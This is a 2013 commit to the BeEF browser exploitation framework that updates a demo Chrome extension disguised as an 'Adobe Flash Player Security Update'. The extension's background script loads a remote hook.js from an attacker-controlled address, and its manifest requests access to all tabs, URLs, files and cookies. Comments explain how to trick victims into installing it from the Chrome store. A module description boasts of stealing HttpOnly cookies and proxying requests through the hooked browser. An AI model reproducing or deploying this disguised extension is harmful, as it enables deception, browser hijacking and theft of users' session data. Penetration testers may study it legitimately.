Updated Chrome sample extension with latest requirements (CSP/version/etc.). Not it works on latest Chrome. Also Updated the fake_flash_update description with more info.

2013-02-12 10:53:19 +00:00
parent 88086811a0
commit 074a11c85a
3 changed files with 35 additions and 26 deletions
--- a/extensions/demos/flash_update_chrome_extension/background.js
+++ b/extensions/demos/flash_update_chrome_extension/background.js
@@ -6,5 +6,6 @@

 d=document;
 e=d.createElement('script');
-e.src="http://127.0.0.1:3000/hook.js";
-d.body.appendChild(e); 
+e.src="https://192.168.0.2/hook.js";
+d.body.appendChild(e);
+
--- a/extensions/demos/flash_update_chrome_extension/manifest.json
+++ b/extensions/demos/flash_update_chrome_extension/manifest.json
@@ -1,26 +1,34 @@
 {
-  // Simple chrome extension 
-  // Just loads beef into the extension context.
-  // 
-  // You may need to set the IP address of the beef hook in background.js
-  // Then you can pack the extension (from within the chrome extensions page) and add the crx file to extensions/demos/html/ 
+    // Simple chrome extension, by antisnatchor and Mike Haworth
+    // Just loads BeEF into the extension context.
+    //
+    // 1. You need to set the IP address (better the domain) of the BeEF hook in background.js
+    // 2. The BeEF hook address must be == to the CSP allowed domain here below. BeEF must listen on port 443, with TLS enabled.
+    //    Only localhost origin is allowed to load scripts from non HTTPS resources. For anything else, you must use HTTPS.
+    // 4. You need to upload the extension, as a zip file, to Google Chrome store.
+    //    In latest versions of Chrome (>= 21) you can't install an extension from a different location anymore,
+    //    so the extension can't be served by BeEF anymore. You need to trick the victim to install
+    //    the extension from Google Chrome store.
+    //

-  "name": "Adobe Flash Player",
-  "version": "11.2.202.235",
-  "description": "Introduces vulnerabilites into web browsers",
-  "background": {
-    "scripts": ["background.js"]
-  },
-  "icons": { 
-    "16": "icon16.png",
-    "48": "icon48.png",
-    "128": "icon128.png" 
-  },
-  "permissions": [
-	"tabs", 
-	"http://*/*", 
-	"https://*/*",
-  "file://*/*",
-  "cookies"
-  ]
+    "name": "Adobe Flash Player Security Update",
+    "manifest_version": 2,
+    "version": "11.5.502.149",
+    "description": "Updates Adobe Flash Player with latest securty updates",
+    "background": {
+        "scripts": ["background.js"]
+    },
+    "content_security_policy": "script-src 'self' 'unsafe-eval' https://192.168.0.2; object-src 'self'",
+    "icons": {
+        "16": "icon16.png",
+        "48": "icon48.png",
+        "128": "icon128.png"
+    },
+    "permissions": [
+        "tabs",
+        "http://*/*",
+        "https://*/*",
+        "file://*/*",
+        "cookies"
+    ]
 }
--- a/modules/social_engineering/fake_flash_update/config.yaml
+++ b/modules/social_engineering/fake_flash_update/config.yaml
@@ -9,7 +9,7 @@ beef:
            enable: true
            category: "Social Engineering"
            name: "Fake Flash Update"
-            description: "Prompts the user to install an update to Adobe Flash Player.<br />The file to be delivered could be a Chrome or Firefox extension. <br /><br /> A Chrome extension has privileged access and can do a whole lot.. <ul><li>- Access all tabs and inject beef into all tabs</li><li>- Use hooked browser as a proxy to do cross domain requests</li><li>- Get all cookies including HTTPonly cookies</li></ul><br />See chrome extensions beef modules for more examples<br />See extensions/demos/flash_update_chrome_extension for extension source. <b>Note</b>: the Chrome extension delivery will work on Chrome <= 20. From Chrome 21 things changed in terms of how extensions can be loaded.<br /><br />The Firefox extension is disabling PortBanning (ports 20,21,22,25,110,143), enabling Java, overriding the UserAgent and the default home/new_tab pages.<br />See extensions/ipec/files/LinkTargetFinder dirrectory for the Firefox extension source."
+            description: "Prompts the user to install an update to Adobe Flash Player.<br />The file to be delivered could be a Chrome or Firefox extension. <br /><br /> A Chrome extension has privileged access and can do a whole lot.. <ul><li>- Access all tabs and inject beef into all tabs</li><li>- Use hooked browser as a proxy to do cross domain requests</li><li>- Get all cookies including HTTPonly cookies</li></ul><br />See chrome extensions beef modules for more examples<br />See extensions/demos/flash_update_chrome_extension for extension source. <b>Note</b>: the Chrome extension delivery will work on Chrome <= 20. From Chrome 21 things changed in terms of how extensions can be loaded. See extensions/demos/flash_update_chrome_extension/manifest.json for more info and a sample extension that works on latest Chrome.<br /><br />The Firefox extension is disabling PortBanning (ports 20,21,22,25,110,143), enabling Java, overriding the UserAgent and the default home/new_tab pages.<br />See extensions/ipec/files/LinkTargetFinder dirrectory for the Firefox extension source."
            authors: ["mh", "antisnatchor"]
            target:
                user_notify: ['ALL']